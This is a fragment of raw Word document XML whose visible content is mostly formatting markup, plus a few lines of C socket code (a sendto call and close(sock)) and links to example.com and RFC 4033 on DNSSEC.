          <w:p w14:paraId="31397411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sendto(sock, buffer, pkt_size, 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04266B39" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US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     (struct sockaddr *)&amp;dest_info, sizeof(dest_info));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50EC2247" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="0000000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RPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>close(sock);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DEBDCF5" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C884A58" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A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</w:tbl>
    <w:p w14:paraId="18EF402A" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E65B3A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2C1668" w14:textId="77777777" w:rsidR="00FF20A7" w:rsidRDefault="00FF20A7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A88EA98" w14:textId="77777777" w:rsidR="00FF20A7" w:rsidRDefault="00FF20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2C51E5" w14:textId="77777777" w:rsidR="00F10630" w:rsidRDefault="00F10630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A9345B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
    <w:pPr>
      <w:ind w:left="720"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">- </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00F10630">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> -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BC2C84" w14:textId="77777777" w:rsidR="00F10630" w:rsidRDefault="00F10630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36C166" w14:textId="77777777" w:rsidR="00FF20A7" w:rsidRDefault="00FF20A7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3DD73269" w14:textId="77777777" w:rsidR="00FF20A7" w:rsidRDefault="00FF20A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ECA539" w14:textId="77777777" w:rsidR="00F10630" w:rsidRDefault="00F10630">
    <w:pPr>
      <w:pStyle w:val="af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D63C98" w14:textId="77777777" w:rsidR="00F10630" w:rsidRDefault="00F10630">
    <w:pPr>
      <w:pStyle w:val="af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CCC2B0" w14:textId="77777777" w:rsidR="00F10630" w:rsidRDefault="00F10630">
    <w:pPr>
      <w:pStyle w:val="af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CD10C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FB6C6C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54F262A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92BCD37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80A6718"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B032DA9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1F01C0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A71A18C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64B07F5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C6E148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7D2A107D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F301B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7F507D24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="437A30D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605428158">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2107074537">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1230533925">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1096054787">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="119349988">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1901817951">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="80022417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6"/>
  <w:displayBackgroundShape/>
  <w:bordersDoNotSurroundHeader/>
  <w:bordersDoNotSurroundFooter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5B3A"/>
    <w:rsid w:val="00094784"/>
    <w:rsid w:val="001669AB"/>
    <w:rsid w:val="00435BB5"/>
    <w:rsid w:val="00834042"/>
    <w:rsid w:val="008738C9"/>
    <w:rsid w:val="00E65B3A"/>
    <w:rsid w:val="00F10630"/>
    <w:rsid w:val="00FD0607"/>
    <w:rsid w:val="00FF20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F45461"/>
  <w15:docId w15:val="{F31286D7-C3B1-9A44-B4B8-83FACFC20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0">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F1063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f0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F10630"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F1063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f1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F106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hyperlink" Target="http://www.example.com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yperlink" Target="http://www.example.com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hyperlink" Target="https://datatracker.ietf.org/doc/html/rfc4033" TargetMode="External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hyperlink" Target="http://www.example.com" TargetMode="External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://www.example.com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oter" Target="footer1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com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22</Pages>
  <Words>2788</Words>
  <Characters>15892</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>132</Lines>
  <Paragraphs>37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민현선</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-09T06:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-10T02:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>